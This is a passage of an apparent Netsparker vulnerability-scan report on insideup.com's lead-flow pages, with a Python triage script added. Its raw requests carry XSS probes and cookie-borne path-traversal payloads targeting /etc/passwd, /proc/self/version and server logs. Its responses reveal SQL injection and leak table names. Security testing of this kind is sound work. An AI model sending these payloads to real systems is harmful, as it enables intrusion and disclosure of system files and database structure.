GET /ppc/leadflow/lodi00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005F6)%3C/script%3E&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:28:09 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=j57biq15rjkv24d3727vin1dt0; path=/
Content-Length: 3253
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='"--></style></script><script>netsparker(0x0005F6)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='"--></style></script><script>netsparker(0x0005F6)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='"--></style></script><script>netsparker(0x0005F6)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='"--></style></script><script>netsparker(0x0005F6)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='"--></style></script><script>netsparker(0x0005F6)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='"--></style></script><script>netsparker(0x0005F6)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join 
lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='"--></style></script><script>netsparker(0x0005F6)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='"--></style></script><script>netsparker(0x0005F6)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId='"--></style></script><script>netsparker(0x0005F6)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId='"--></style></script><script>netsparker(0x0005F6)</script>&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005F6)</script>&iusrc=iupsc/' union sel' at line 5
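The response above shows more than the reflected XSS the scanner flagged: the application compares `prj.project_page_url` against the raw request URI (path plus query string), so the `'` in the probe breaks the SQL string literal, and the page then echoes the whole query and the MySQL error back with a `200 OK` and `Content-Type: text/html`. The following triage script is an added example, not part of the Netsparker report or the site's code. It feeds a cut-down copy of the recorded body (constructed here from the text above, with two of the five `lead_flow_*_pages_details` SELECTs) to a check that answers the two questions a reviewer wants settled from such evidence: would the probe actually execute in a browser (it is inside a real `<script>` element, not entity-encoded), and what does the verbose error leak (here, every table name in the query). The `assess` function and the `ScriptCollector` class are names chosen for this example.

```python
import re
from html.parser import HTMLParser

# Constructed sample: a cut-down copy of the response body recorded above for
# /ppc/leadflow/lodi00/project.php. The real body repeats the same SELECT for
# five lead_flow_*_pages_details tables; two are enough to show the pattern.
PROBE = "'\"--></style></script><script>netsparker(0x0005F6)</script>"
URI = "leadflow/lodi00/project.php?catId=" + PROBE + "&iusrc=iupsc"
SELECT = ("select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url "
          "from {table} prj left join sub_category cats on cats.sub_category_id = prj.catId "
          "left join lead_flow_template temps on temps.template_id = prj.templateId "
          "left join lead_flow_group grps on grps.group_id = prj.groupId "
          "where prj.project_page_url = '{uri}' OR prj.project_page_url = '{uri}/'")
SAMPLE_BODY = (
    SELECT.format(table="lead_flow_one_pages_details", uri=URI)
    + " union " + SELECT.format(table="lead_flow_two_pages_details", uri=URI)
    + "You have an error in your SQL syntax; check the manual that corresponds to your "
      "MySQL server version for the right syntax to use near '></style></script>"
      "<script>netsparker(0x0005F6)</script>&iusrc=iupsc/' union sel' at line 5"
)

# MySQL's generic syntax error, as echoed on the page
MYSQL_ERROR = re.compile(r"You have an error in your SQL syntax;.*?at line \d+", re.S)
# any identifier that follows FROM or JOIN in the echoed query
TABLE_REF = re.compile(r"\b(?:from|join)\s+([A-Za-z_]\w*)", re.I)


class ScriptCollector(HTMLParser):
    """Collects the body of every <script> element as a browser would see it."""

    def __init__(self):
        super().__init__()
        self.in_script = False
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        # only text inside a real <script> element counts; entity-encoded
        # "&lt;script&gt;" arrives here as data with in_script still False
        if self.in_script:
            self.scripts[-1] += data


def assess(body, marker):
    """Triage one text/html response: does the probe execute, and what does the SQL error leak?"""
    collector = ScriptCollector()
    collector.feed(body)
    collector.close()
    err = MYSQL_ERROR.search(body)
    return {
        "xss_executes": any(marker in s for s in collector.scripts),
        "sql_error": err.group(0) if err else None,
        # table names are only meaningful when the query itself was echoed
        "leaked_tables": sorted(set(TABLE_REF.findall(body))) if err else [],
    }
```

Run `assess(SAMPLE_BODY, "netsparker(0x0005F6)")` and both findings come back positive, with the five table names from the echoed query; the same call on a page that HTML-encodes the probe reports no executable script and no error.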
- /ppc/leadflow/parl00/project.php

/ppc/leadflow/parl00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/parl00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cs..

Parameters

Parameter Type Value
catId GET '"--></style></script><script>alert(0x0005F7)</script>
iusrc GET iupsc

Request

GET /ppc/leadflow/parl00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005F7)%3C/script%3E&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:28:10 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=e20ou7mddrehq6s8pgevnrv6h1; path=/
Content-Length: 3253
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='"--></style></script><script>netsparker(0x0005F7)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='"--></style></script><script>netsparker(0x0005F7)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='"--></style></script><script>netsparker(0x0005F7)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='"--></style></script><script>netsparker(0x0005F7)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='"--></style></script><script>netsparker(0x0005F7)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='"--></style></script><script>netsparker(0x0005F7)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join 
lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='"--></style></script><script>netsparker(0x0005F7)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='"--></style></script><script>netsparker(0x0005F7)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId='"--></style></script><script>netsparker(0x0005F7)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/parl00/project.php?catId='"--></style></script><script>netsparker(0x0005F7)</script>&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005F7)</script>&iusrc=iupsc/' union sel' at line 5
- /ppc/leadflow/lodi00/project.php

/ppc/leadflow/lodi00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/lodi00/project.php?catId=110003&iusrc='%22--%3E%3C/style%3E%3C/..

Parameters

Parameter Type Value
catId GET 110003
iusrc GET '"--></style></script><script>alert(0x0005FA)</script>

Request

GET /ppc/leadflow/lodi00/project.php?catId=110003&iusrc='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005FA)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 